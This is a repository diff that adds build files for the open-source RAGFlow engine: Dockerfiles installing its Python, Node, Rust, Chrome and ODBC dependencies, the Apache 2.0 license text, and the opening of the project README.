2
+ FROM ubuntu:22.04 AS base
3
+ USER root
4
+ SHELL ["/bin/bash", "-c"]
5
+
6
+ ARG NEED_MIRROR=0
7
+ ARG LIGHTEN=0
8
+ ENV LIGHTEN=${LIGHTEN}
9
+
10
+ WORKDIR /ragflow
11
+
12
+ # Copy models downloaded via download_deps.py
13
+ RUN mkdir -p /ragflow/rag/res/deepdoc /root/.ragflow
14
+ RUN --mount=type=bind,from=infiniflow/ragflow_deps:latest,source=/huggingface.co,target=/huggingface.co \
15
+ cp /huggingface.co/InfiniFlow/huqie/huqie.txt.trie /ragflow/rag/res/ && \
16
+ tar --exclude='.*' -cf - \
17
+ /huggingface.co/InfiniFlow/text_concat_xgb_v1.0 \
18
+ /huggingface.co/InfiniFlow/deepdoc \
19
+ | tar -xf - --strip-components=3 -C /ragflow/rag/res/deepdoc
20
+ RUN --mount=type=bind,from=infiniflow/ragflow_deps:latest,source=/huggingface.co,target=/huggingface.co \
21
+ if [ "$LIGHTEN" != "1" ]; then \
22
+ (tar -cf - \
23
+ /huggingface.co/BAAI/bge-large-zh-v1.5 \
24
+ /huggingface.co/BAAI/bge-reranker-v2-m3 \
25
+ /huggingface.co/maidalun1020/bce-embedding-base_v1 \
26
+ /huggingface.co/maidalun1020/bce-reranker-base_v1 \
27
+ | tar -xf - --strip-components=2 -C /root/.ragflow) \
28
+ fi
29
+
30
+ # https://github.com/chrismattmann/tika-python
31
+ # This is the only way to run python-tika without internet access. Without this set, the default is to check the tika version and pull latest every time from Apache.
32
+ RUN --mount=type=bind,from=infiniflow/ragflow_deps:latest,source=/,target=/deps \
33
+ cp -r /deps/nltk_data /root/ && \
34
+ cp /deps/tika-server-standard-3.0.0.jar /deps/tika-server-standard-3.0.0.jar.md5 /ragflow/ && \
35
+ cp /deps/cl100k_base.tiktoken /ragflow/9b5ad71b2ce5302211f9c61530b329a4922fc6a4
36
+
37
+ ENV TIKA_SERVER_JAR="file:///ragflow/tika-server-standard-3.0.0.jar"
38
+ ENV DEBIAN_FRONTEND=noninteractive
39
+
40
+ # Setup apt
41
+ # Python package and implicit dependencies:
42
+ # opencv-python: libglib2.0-0 libglx-mesa0 libgl1
43
+ # aspose-slides: pkg-config libicu-dev libgdiplus libssl1.1_1.1.1f-1ubuntu2_amd64.deb
44
+ # python-pptx: default-jdk tika-server-standard-3.0.0.jar
45
+ # selenium: libatk-bridge2.0-0 chrome-linux64-121-0-6167-85
46
+ # Building C extensions: libpython3-dev libgtk-4-1 libnss3 xdg-utils libgbm-dev
47
+ RUN --mount=type=cache,id=ragflow_apt,target=/var/cache/apt,sharing=locked \
48
+ if [ "$NEED_MIRROR" == "1" ]; then \
49
+ sed -i 's|http://archive.ubuntu.com|https://mirrors.tuna.tsinghua.edu.cn|g' /etc/apt/sources.list; \
50
+ fi; \
51
+ rm -f /etc/apt/apt.conf.d/docker-clean && \
52
+ echo 'Binary::apt::APT::Keep-Downloaded-Packages "true";' > /etc/apt/apt.conf.d/keep-cache && \
53
+ chmod 1777 /tmp && \
54
+ apt update && \
55
+ apt --no-install-recommends install -y ca-certificates && \
56
+ apt update && \
57
+ apt install -y libglib2.0-0 libglx-mesa0 libgl1 && \
58
+ apt install -y pkg-config libicu-dev libgdiplus && \
59
+ apt install -y default-jdk && \
60
+ apt install -y libatk-bridge2.0-0 && \
61
+ apt install -y libpython3-dev libgtk-4-1 libnss3 xdg-utils libgbm-dev && \
62
+ apt install -y python3-pip pipx nginx unzip curl wget git vim less
63
+
64
+ RUN if [ "$NEED_MIRROR" == "1" ]; then \
65
+ pip3 config set global.index-url https://pypi.tuna.tsinghua.edu.cn/simple && \
66
+ pip3 config set global.trusted-host pypi.tuna.tsinghua.edu.cn; \
67
+ mkdir -p /etc/uv && \
68
+ echo "[[index]]" > /etc/uv/uv.toml && \
69
+ echo 'url = "https://pypi.tuna.tsinghua.edu.cn/simple"' >> /etc/uv/uv.toml && \
70
+ echo "default = true" >> /etc/uv/uv.toml; \
71
+ fi; \
72
+ pipx install uv
73
+
74
+ ENV PYTHONDONTWRITEBYTECODE=1 DOTNET_SYSTEM_GLOBALIZATION_INVARIANT=1
75
+ ENV PATH=/root/.local/bin:$PATH
76
+
77
+ # nodejs 12.22 on Ubuntu 22.04 is too old
78
+ RUN --mount=type=cache,id=ragflow_apt,target=/var/cache/apt,sharing=locked \
79
+ curl -fsSL https://deb.nodesource.com/setup_20.x | bash - && \
80
+ apt purge -y nodejs npm cargo && \
81
+ apt autoremove -y && \
82
+ apt update && \
83
+ apt install -y nodejs
84
+
85
+ # A modern version of cargo is needed for the latest version of the Rust compiler.
86
+ RUN apt update && apt install -y curl build-essential \
87
+ && if [ "$NEED_MIRROR" == "1" ]; then \
88
+ # Use TUNA mirrors for rustup/rust dist files
89
+ export RUSTUP_DIST_SERVER="https://mirrors.tuna.tsinghua.edu.cn/rustup"; \
90
+ export RUSTUP_UPDATE_ROOT="https://mirrors.tuna.tsinghua.edu.cn/rustup/rustup"; \
91
+ echo "Using TUNA mirrors for Rustup."; \
92
+ fi; \
93
+ # Force curl to use HTTP/1.1
94
+ curl --proto '=https' --tlsv1.2 --http1.1 -sSf https://sh.rustup.rs | bash -s -- -y --profile minimal \
95
+ && echo 'export PATH="/root/.cargo/bin:${PATH}"' >> /root/.bashrc
96
+
97
+ ENV PATH="/root/.cargo/bin:${PATH}"
98
+
99
+ RUN cargo --version && rustc --version
100
+
101
+ # Add msssql ODBC driver
102
+ # macOS ARM64 environment, install msodbcsql18.
103
+ # general x86_64 environment, install msodbcsql17.
104
+ RUN --mount=type=cache,id=ragflow_apt,target=/var/cache/apt,sharing=locked \
105
+ curl https://packages.microsoft.com/keys/microsoft.asc | apt-key add - && \
106
+ curl https://packages.microsoft.com/config/ubuntu/22.04/prod.list > /etc/apt/sources.list.d/mssql-release.list && \
107
+ apt update && \
108
+ arch="$(uname -m)"; \
109
+ if [ "$arch" = "arm64" ] || [ "$arch" = "aarch64" ]; then \
110
+ # ARM64 (macOS/Apple Silicon or Linux aarch64)
111
+ ACCEPT_EULA=Y apt install -y unixodbc-dev msodbcsql18; \
112
+ else \
113
+ # x86_64 or others
114
+ ACCEPT_EULA=Y apt install -y unixodbc-dev msodbcsql17; \
115
+ fi || \
116
+ { echo "Failed to install ODBC driver"; exit 1; }
117
+
118
+
119
+
120
+ # Add dependencies of selenium
121
+ RUN --mount=type=bind,from=infiniflow/ragflow_deps:latest,source=/chrome-linux64-121-0-6167-85,target=/chrome-linux64.zip \
122
+ unzip /chrome-linux64.zip && \
123
+ mv chrome-linux64 /opt/chrome && \
124
+ ln -s /opt/chrome/chrome /usr/local/bin/
125
+ RUN --mount=type=bind,from=infiniflow/ragflow_deps:latest,source=/chromedriver-linux64-121-0-6167-85,target=/chromedriver-linux64.zip \
126
+ unzip -j /chromedriver-linux64.zip chromedriver-linux64/chromedriver && \
127
+ mv chromedriver /usr/local/bin/ && \
128
+ rm -f /usr/bin/google-chrome
129
+
130
+ # https://forum.aspose.com/t/aspose-slides-for-net-no-usable-version-of-libssl-found-with-linux-server/271344/13
131
+ # aspose-slides on linux/arm64 is unavailable
132
+ RUN --mount=type=bind,from=infiniflow/ragflow_deps:latest,source=/,target=/deps \
133
+ if [ "$(uname -m)" = "x86_64" ]; then \
134
+ dpkg -i /deps/libssl1.1_1.1.1f-1ubuntu2_amd64.deb; \
135
+ elif [ "$(uname -m)" = "aarch64" ]; then \
136
+ dpkg -i /deps/libssl1.1_1.1.1f-1ubuntu2_arm64.deb; \
137
+ fi
138
+
139
+
140
+ # builder stage
141
+ FROM base AS builder
142
+ USER root
143
+
144
+ WORKDIR /ragflow
145
+
146
+ # install dependencies from uv.lock file
147
+ COPY pyproject.toml uv.lock ./
148
+
149
+ # https://github.com/astral-sh/uv/issues/10462
150
+ # uv records index url into uv.lock but doesn't failover among multiple indexes
151
+ RUN --mount=type=cache,id=ragflow_uv,target=/root/.cache/uv,sharing=locked \
152
+ if [ "$NEED_MIRROR" == "1" ]; then \
153
+ sed -i 's|pypi.org|pypi.tuna.tsinghua.edu.cn|g' uv.lock; \
154
+ else \
155
+ sed -i 's|pypi.tuna.tsinghua.edu.cn|pypi.org|g' uv.lock; \
156
+ fi; \
157
+ if [ "$LIGHTEN" == "1" ]; then \
158
+ uv sync --python 3.10 --frozen; \
159
+ else \
160
+ uv sync --python 3.10 --frozen --all-extras; \
161
+ fi
162
+
163
+ COPY web web
164
+ COPY docs docs
165
+ RUN --mount=type=cache,id=ragflow_npm,target=/root/.npm,sharing=locked \
166
+ cd web && npm install && npm run build
167
+
168
+ COPY .git /ragflow/.git
169
+
170
+ RUN version_info=$(git describe --tags --match=v* --first-parent --always); \
171
+ if [ "$LIGHTEN" == "1" ]; then \
172
+ version_info="$version_info slim"; \
173
+ else \
174
+ version_info="$version_info full"; \
175
+ fi; \
176
+ echo "RAGFlow version: $version_info"; \
177
+ echo $version_info > /ragflow/VERSION
178
+
179
+ # production stage
180
+ FROM base AS production
181
+ USER root
182
+
183
+ WORKDIR /ragflow
184
+
185
+ # Copy Python environment and packages
186
+ ENV VIRTUAL_ENV=/ragflow/.venv
187
+ COPY --from=builder ${VIRTUAL_ENV} ${VIRTUAL_ENV}
188
+ ENV PATH="${VIRTUAL_ENV}/bin:${PATH}"
189
+
190
+ ENV PYTHONPATH=/ragflow/
191
+
192
+ COPY web web
193
+ COPY api api
194
+ COPY conf conf
195
+ COPY deepdoc deepdoc
196
+ COPY rag rag
197
+ COPY agent agent
198
+ COPY graphrag graphrag
199
+ COPY pyproject.toml uv.lock ./
200
+
201
+ COPY docker/service_conf.yaml.template ./conf/service_conf.yaml.template
202
+ COPY docker/entrypoint.sh docker/entrypoint-parser.sh ./
203
+ RUN chmod +x ./entrypoint*.sh
204
+
205
+ # Copy compiled web pages
206
+ COPY --from=builder /ragflow/web/dist /ragflow/web/dist
207
+
208
+ COPY --from=builder /ragflow/VERSION /ragflow/VERSION
209
+ ENTRYPOINT ["./entrypoint.sh"]
ragflow-main/Dockerfile.deps ADDED
@@ -0,0 +1,10 @@
 
 
 
 
 
 
 
 
 
 
 
1
+ # This builds an image that contains the resources needed by Dockerfile
2
+ #
3
+ FROM scratch
4
+
5
+ # Copy resources downloaded via download_deps.py
6
+ COPY chromedriver-linux64-121-0-6167-85 chrome-linux64-121-0-6167-85 cl100k_base.tiktoken libssl1.1_1.1.1f-1ubuntu2_amd64.deb libssl1.1_1.1.1f-1ubuntu2_arm64.deb tika-server-standard-3.0.0.jar tika-server-standard-3.0.0.jar.md5 libssl*.deb /
7
+
8
+ COPY nltk_data /nltk_data
9
+
10
+ COPY huggingface.co /huggingface.co
ragflow-main/Dockerfile.scratch.oc9 ADDED
@@ -0,0 +1,60 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ FROM opencloudos/opencloudos:9.0
2
+ USER root
3
+
4
+ WORKDIR /ragflow
5
+
6
+ RUN dnf update -y && dnf install -y wget curl gcc-c++ openmpi-devel
7
+
8
+ RUN wget https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh -O ~/miniconda.sh && \
9
+ bash ~/miniconda.sh -b -p /root/miniconda3 && \
10
+ rm ~/miniconda.sh && ln -s /root/miniconda3/etc/profile.d/conda.sh /etc/profile.d/conda.sh && \
11
+ echo ". /root/miniconda3/etc/profile.d/conda.sh" >> ~/.bashrc && \
12
+ echo "conda activate base" >> ~/.bashrc
13
+
14
+ ENV PATH /root/miniconda3/bin:$PATH
15
+
16
+ RUN conda create -y --name py11 python=3.11
17
+
18
+ ENV CONDA_DEFAULT_ENV py11
19
+ ENV CONDA_PREFIX /root/miniconda3/envs/py11
20
+ ENV PATH $CONDA_PREFIX/bin:$PATH
21
+
22
+ # RUN curl -sL https://rpm.nodesource.com/setup_14.x | bash -
23
+ RUN dnf install -y nodejs
24
+
25
+ RUN dnf install -y nginx
26
+
27
+ ADD ./web ./web
28
+ ADD ./api ./api
29
+ ADD ./docs ./docs
30
+ ADD ./conf ./conf
31
+ ADD ./deepdoc ./deepdoc
32
+ ADD ./rag ./rag
33
+ ADD ./requirements.txt ./requirements.txt
34
+ ADD ./agent ./agent
35
+ ADD ./graphrag ./graphrag
36
+
37
+ RUN dnf install -y openmpi openmpi-devel python3-openmpi
38
+ ENV C_INCLUDE_PATH /usr/include/openmpi-x86_64:$C_INCLUDE_PATH
39
+ ENV LD_LIBRARY_PATH /usr/lib64/openmpi/lib:$LD_LIBRARY_PATH
40
+ RUN rm /root/miniconda3/envs/py11/compiler_compat/ld
41
+ RUN cd ./web && npm i && npm run build
42
+ RUN conda run -n py11 pip install $(grep -ivE "mpi4py" ./requirements.txt) # without mpi4py==3.1.5
43
+ RUN conda run -n py11 pip install redis
44
+
45
+ RUN dnf update -y && \
46
+ dnf install -y glib2 mesa-libGL && \
47
+ dnf clean all
48
+
49
+ RUN conda run -n py11 pip install ollama
50
+ RUN conda run -n py11 python -m nltk.downloader punkt
51
+ RUN conda run -n py11 python -m nltk.downloader wordnet
52
+
53
+ ENV PYTHONPATH=/ragflow/
54
+ ENV HF_ENDPOINT=https://hf-mirror.com
55
+
56
+ COPY docker/service_conf.yaml.template ./conf/service_conf.yaml.template
57
+ ADD docker/entrypoint.sh ./entrypoint.sh
58
+ RUN chmod +x ./entrypoint.sh
59
+
60
+ ENTRYPOINT ["./entrypoint.sh"]
ragflow-main/LICENSE ADDED
@@ -0,0 +1,201 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ Apache License
2
+ Version 2.0, January 2004
3
+ http://www.apache.org/licenses/
4
+
5
+ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
6
+
7
+ 1. Definitions.
8
+
9
+ "License" shall mean the terms and conditions for use, reproduction,
10
+ and distribution as defined by Sections 1 through 9 of this document.
11
+
12
+ "Licensor" shall mean the copyright owner or entity authorized by
13
+ the copyright owner that is granting the License.
14
+
15
+ "Legal Entity" shall mean the union of the acting entity and all
16
+ other entities that control, are controlled by, or are under common
17
+ control with that entity. For the purposes of this definition,
18
+ "control" means (i) the power, direct or indirect, to cause the
19
+ direction or management of such entity, whether by contract or
20
+ otherwise, or (ii) ownership of fifty percent (50%) or more of the
21
+ outstanding shares, or (iii) beneficial ownership of such entity.
22
+
23
+ "You" (or "Your") shall mean an individual or Legal Entity
24
+ exercising permissions granted by this License.
25
+
26
+ "Source" form shall mean the preferred form for making modifications,
27
+ including but not limited to software source code, documentation
28
+ source, and configuration files.
29
+
30
+ "Object" form shall mean any form resulting from mechanical
31
+ transformation or translation of a Source form, including but
32
+ not limited to compiled object code, generated documentation,
33
+ and conversions to other media types.
34
+
35
+ "Work" shall mean the work of authorship, whether in Source or
36
+ Object form, made available under the License, as indicated by a
37
+ copyright notice that is included in or attached to the work
38
+ (an example is provided in the Appendix below).
39
+
40
+ "Derivative Works" shall mean any work, whether in Source or Object
41
+ form, that is based on (or derived from) the Work and for which the
42
+ editorial revisions, annotations, elaborations, or other modifications
43
+ represent, as a whole, an original work of authorship. For the purposes
44
+ of this License, Derivative Works shall not include works that remain
45
+ separable from, or merely link (or bind by name) to the interfaces of,
46
+ the Work and Derivative Works thereof.
47
+
48
+ "Contribution" shall mean any work of authorship, including
49
+ the original version of the Work and any modifications or additions
50
+ to that Work or Derivative Works thereof, that is intentionally
51
+ submitted to Licensor for inclusion in the Work by the copyright owner
52
+ or by an individual or Legal Entity authorized to submit on behalf of
53
+ the copyright owner. For the purposes of this definition, "submitted"
54
+ means any form of electronic, verbal, or written communication sent
55
+ to the Licensor or its representatives, including but not limited to
56
+ communication on electronic mailing lists, source code control systems,
57
+ and issue tracking systems that are managed by, or on behalf of, the
58
+ Licensor for the purpose of discussing and improving the Work, but
59
+ excluding communication that is conspicuously marked or otherwise
60
+ designated in writing by the copyright owner as "Not a Contribution."
61
+
62
+ "Contributor" shall mean Licensor and any individual or Legal Entity
63
+ on behalf of whom a Contribution has been received by Licensor and
64
+ subsequently incorporated within the Work.
65
+
66
+ 2. Grant of Copyright License. Subject to the terms and conditions of
67
+ this License, each Contributor hereby grants to You a perpetual,
68
+ worldwide, non-exclusive, no-charge, royalty-free, irrevocable
69
+ copyright license to reproduce, prepare Derivative Works of,
70
+ publicly display, publicly perform, sublicense, and distribute the
71
+ Work and such Derivative Works in Source or Object form.
72
+
73
+ 3. Grant of Patent License. Subject to the terms and conditions of
74
+ this License, each Contributor hereby grants to You a perpetual,
75
+ worldwide, non-exclusive, no-charge, royalty-free, irrevocable
76
+ (except as stated in this section) patent license to make, have made,
77
+ use, offer to sell, sell, import, and otherwise transfer the Work,
78
+ where such license applies only to those patent claims licensable
79
+ by such Contributor that are necessarily infringed by their
80
+ Contribution(s) alone or by combination of their Contribution(s)
81
+ with the Work to which such Contribution(s) was submitted. If You
82
+ institute patent litigation against any entity (including a
83
+ cross-claim or counterclaim in a lawsuit) alleging that the Work
84
+ or a Contribution incorporated within the Work constitutes direct
85
+ or contributory patent infringement, then any patent licenses
86
+ granted to You under this License for that Work shall terminate
87
+ as of the date such litigation is filed.
88
+
89
+ 4. Redistribution. You may reproduce and distribute copies of the
90
+ Work or Derivative Works thereof in any medium, with or without
91
+ modifications, and in Source or Object form, provided that You
92
+ meet the following conditions:
93
+
94
+ (a) You must give any other recipients of the Work or
95
+ Derivative Works a copy of this License; and
96
+
97
+ (b) You must cause any modified files to carry prominent notices
98
+ stating that You changed the files; and
99
+
100
+ (c) You must retain, in the Source form of any Derivative Works
101
+ that You distribute, all copyright, patent, trademark, and
102
+ attribution notices from the Source form of the Work,
103
+ excluding those notices that do not pertain to any part of
104
+ the Derivative Works; and
105
+
106
+ (d) If the Work includes a "NOTICE" text file as part of its
107
+ distribution, then any Derivative Works that You distribute must
108
+ include a readable copy of the attribution notices contained
109
+ within such NOTICE file, excluding those notices that do not
110
+ pertain to any part of the Derivative Works, in at least one
111
+ of the following places: within a NOTICE text file distributed
112
+ as part of the Derivative Works; within the Source form or
113
+ documentation, if provided along with the Derivative Works; or,
114
+ within a display generated by the Derivative Works, if and
115
+ wherever such third-party notices normally appear. The contents
116
+ of the NOTICE file are for informational purposes only and
117
+ do not modify the License. You may add Your own attribution
118
+ notices within Derivative Works that You distribute, alongside
119
+ or as an addendum to the NOTICE text from the Work, provided
120
+ that such additional attribution notices cannot be construed
121
+ as modifying the License.
122
+
123
+ You may add Your own copyright statement to Your modifications and
124
+ may provide additional or different license terms and conditions
125
+ for use, reproduction, or distribution of Your modifications, or
126
+ for any such Derivative Works as a whole, provided Your use,
127
+ reproduction, and distribution of the Work otherwise complies with
128
+ the conditions stated in this License.
129
+
130
+ 5. Submission of Contributions. Unless You explicitly state otherwise,
131
+ any Contribution intentionally submitted for inclusion in the Work
132
+ by You to the Licensor shall be under the terms and conditions of
133
+ this License, without any additional terms or conditions.
134
+ Notwithstanding the above, nothing herein shall supersede or modify
135
+ the terms of any separate license agreement you may have executed
136
+ with Licensor regarding such Contributions.
137
+
138
+ 6. Trademarks. This License does not grant permission to use the trade
139
+ names, trademarks, service marks, or product names of the Licensor,
140
+ except as required for reasonable and customary use in describing the
141
+ origin of the Work and reproducing the content of the NOTICE file.
142
+
143
+ 7. Disclaimer of Warranty. Unless required by applicable law or
144
+ agreed to in writing, Licensor provides the Work (and each
145
+ Contributor provides its Contributions) on an "AS IS" BASIS,
146
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
147
+ implied, including, without limitation, any warranties or conditions
148
+ of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
149
+ PARTICULAR PURPOSE. You are solely responsible for determining the
150
+ appropriateness of using or redistributing the Work and assume any
151
+ risks associated with Your exercise of permissions under this License.
152
+
153
+ 8. Limitation of Liability. In no event and under no legal theory,
154
+ whether in tort (including negligence), contract, or otherwise,
155
+ unless required by applicable law (such as deliberate and grossly
156
+ negligent acts) or agreed to in writing, shall any Contributor be
157
+ liable to You for damages, including any direct, indirect, special,
158
+ incidental, or consequential damages of any character arising as a
159
+ result of this License or out of the use or inability to use the
160
+ Work (including but not limited to damages for loss of goodwill,
161
+ work stoppage, computer failure or malfunction, or any and all
162
+ other commercial damages or losses), even if such Contributor
163
+ has been advised of the possibility of such damages.
164
+
165
+ 9. Accepting Warranty or Additional Liability. While redistributing
166
+ the Work or Derivative Works thereof, You may choose to offer,
167
+ and charge a fee for, acceptance of support, warranty, indemnity,
168
+ or other liability obligations and/or rights consistent with this
169
+ License. However, in accepting such obligations, You may act only
170
+ on Your own behalf and on Your sole responsibility, not on behalf
171
+ of any other Contributor, and only if You agree to indemnify,
172
+ defend, and hold each Contributor harmless for any liability
173
+ incurred by, or claims asserted against, such Contributor by reason
174
+ of your accepting any such warranty or additional liability.
175
+
176
+ END OF TERMS AND CONDITIONS
177
+
178
+ APPENDIX: How to apply the Apache License to your work.
179
+
180
+ To apply the Apache License to your work, attach the following
181
+ boilerplate notice, with the fields enclosed by brackets "[]"
182
+ replaced with your own identifying information. (Don't include
183
+ the brackets!) The text should be enclosed in the appropriate
184
+ comment syntax for the file format. We also recommend that a
185
+ file or class name and description of purpose be included on the
186
+ same "printed page" as the copyright notice for easier
187
+ identification within third-party archives.
188
+
189
+ Copyright [yyyy] [name of copyright owner]
190
+
191
+ Licensed under the Apache License, Version 2.0 (the "License");
192
+ you may not use this file except in compliance with the License.
193
+ You may obtain a copy of the License at
194
+
195
+ http://www.apache.org/licenses/LICENSE-2.0
196
+
197
+ Unless required by applicable law or agreed to in writing, software
198
+ distributed under the License is distributed on an "AS IS" BASIS,
199
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
200
+ See the License for the specific language governing permissions and
201
+ limitations under the License.
ragflow-main/README.md ADDED
@@ -0,0 +1,364 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ <div align="center">
2
+ <a href="https://demo.ragflow.io/">
3
+ <img src="web/src/assets/logo-with-text.png" width="520" alt="ragflow logo">
4
+ </a>
5
+ </div>
6
+
7
+ <p align="center">
8
+ <a href="./README.md">English</a> |
9
+ <a href="./README_zh.md">简体中文</a> |
10
+ <a href="./README_tzh.md">繁体中文</a> |
11
+ <a href="./README_ja.md">日本語</a> |
12
+ <a href="./README_ko.md">한국어</a> |
13
+ <a href="./README_id.md">Bahasa Indonesia</a> |
14
+ <a href="/README_pt_br.md">Português (Brasil)</a>
15
+ </p>
16
+
17
+ <p align="center">
18
+ <a href="https://x.com/intent/follow?screen_name=infiniflowai" target="_blank">
19
+ <img src="https://img.shields.io/twitter/follow/infiniflow?logo=X&color=%20%23f5f5f5" alt="follow on X(Twitter)">
20
+ </a>
21
+ <a href="https://demo.ragflow.io" target="_blank">
22
+ <img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99">
23
+ </a>
24
+ <a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
25
+ <img src="https://img.shields.io/badge/docker_pull-ragflow:v0.16.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.16.0">
26
+ </a>
27
+ <a href="https://github.com/infiniflow/ragflow/releases/latest">
28
+ <img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
29
+ </a>
30
+ <a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
31
+ <img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
32
+ </a>
33
+ </p>
34
+
35
+ <h4 align="center">
36
+ <a href="https://ragflow.io/docs/dev/">Document</a> |
37
+ <a href="https://github.com/infiniflow/ragflow/issues/4214">Roadmap</a> |
38
+ <a href="https://twitter.com/infiniflowai">Twitter</a> |
39
+ <a href="https://discord.gg/4XxujFgUN7">Discord</a> |
40
+ <a href="https://demo.ragflow.io">Demo</a>
41
+ </h4>
42
+
43
+ <details open>
44
+ <summary><b>📕 Table of Contents</b></summary>
45
+
46
+ - 💡 [What is RAGFlow?](#-what-is-ragflow)
47
+ - 🎮 [Demo](#-demo)
48
+ - 📌 [Latest Updates](#-latest-updates)
49
+ - 🌟 [Key Features](#-key-features)
50
+ - 🔎 [System Architecture](#-system-architecture)
51
+ - 🎬 [Get Started](#-get-started)
52
+ - 🔧 [Configurations](#-configurations)
53
+ - 🔧 [Build a docker image without embedding models](#-build-a-docker-image-without-embedding-models)
54
+ - 🔧 [Build a docker image including embedding models](#-build-a-docker-image-including-embedding-models)
55
+ - 🔨 [Launch service from source for development](#-launch-service-from-source-for-development)
56
+ - 📚 [Documentation](#-documentation)
57
+ - 📜 [Roadmap](#-roadmap)
58
+ - 🏄 [Community](#-community)
59
+ - 🙌 [Contributing](#-contributing)
60
+
61
+ </details>
62
+
63
+ ## 💡 What is RAGFlow?
64
+
65
+ [RAGFlow](https://ragflow.io/) is an open-source RAG (Retrieval-Augmented Generation) engine based on deep document
66
+ understanding. It offers a streamlined RAG workflow for businesses of any scale, combining LLM (Large Language Models)
67
+ to provide truthful question-answering capabilities, backed by well-founded citations from various complex formatted
68
+ data.
69
+
70
+ ## 🎮 Demo
71
+
72
+ Try our demo at [https://demo.ragflow.io](https://demo.ragflow.io).
73
+
74
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
75
+ <img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
76
+ <img src="https://github.com/user-attachments/assets/504bbbf1-c9f7-4d83-8cc5-e9cb63c26db6" width="1200"/>
77
+ </div>
78
+
79
+ ## 🔥 Latest Updates
80
+
81
+ - 2025-02-05 Updates the model list of 'SILICONFLOW' and adds support for Deepseek-R1/DeepSeek-V3.
82
+ - 2025-01-26 Optimizes knowledge graph extraction and application, offering various configuration options.
83
+ - 2024-12-18 Upgrades Document Layout Analysis model in Deepdoc.
84
+ - 2024-12-04 Adds support for pagerank score in knowledge base.
85
+ - 2024-11-22 Adds more variables to Agent.
86
+ - 2024-11-01 Adds keyword extraction and related question generation to the parsed chunks to improve the accuracy of retrieval.
87
+ - 2024-08-22 Support text to SQL statements through RAG.
88
+
89
+ ## 🎉 Stay Tuned
90
+
91
+ ⭐️ Star our repository to stay up-to-date with exciting new features and improvements! Get instant notifications for new
92
+ releases! 🌟
93
+
94
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
95
+ <img src="https://github.com/user-attachments/assets/18c9707e-b8aa-4caf-a154-037089c105ba" width="1200"/>
96
+ </div>
97
+
98
+ ## 🌟 Key Features
99
+
100
+ ### 🍭 **"Quality in, quality out"**
101
+
102
+ - [Deep document understanding](./deepdoc/README.md)-based knowledge extraction from unstructured data with complicated
103
+ formats.
104
+ - Finds "needle in a data haystack" of literally unlimited tokens.
105
+
106
+ ### 🍱 **Template-based chunking**
107
+
108
+ - Intelligent and explainable.
109
+ - Plenty of template options to choose from.
110
+
111
+ ### 🌱 **Grounded citations with reduced hallucinations**
112
+
113
+ - Visualization of text chunking to allow human intervention.
114
+ - Quick view of the key references and traceable citations to support grounded answers.
115
+
116
+ ### 🍔 **Compatibility with heterogeneous data sources**
117
+
118
+ - Supports Word, slides, excel, txt, images, scanned copies, structured data, web pages, and more.
119
+
120
+ ### 🛀 **Automated and effortless RAG workflow**
121
+
122
+ - Streamlined RAG orchestration catered to both personal and large businesses.
123
+ - Configurable LLMs as well as embedding models.
124
+ - Multiple recall paired with fused re-ranking.
125
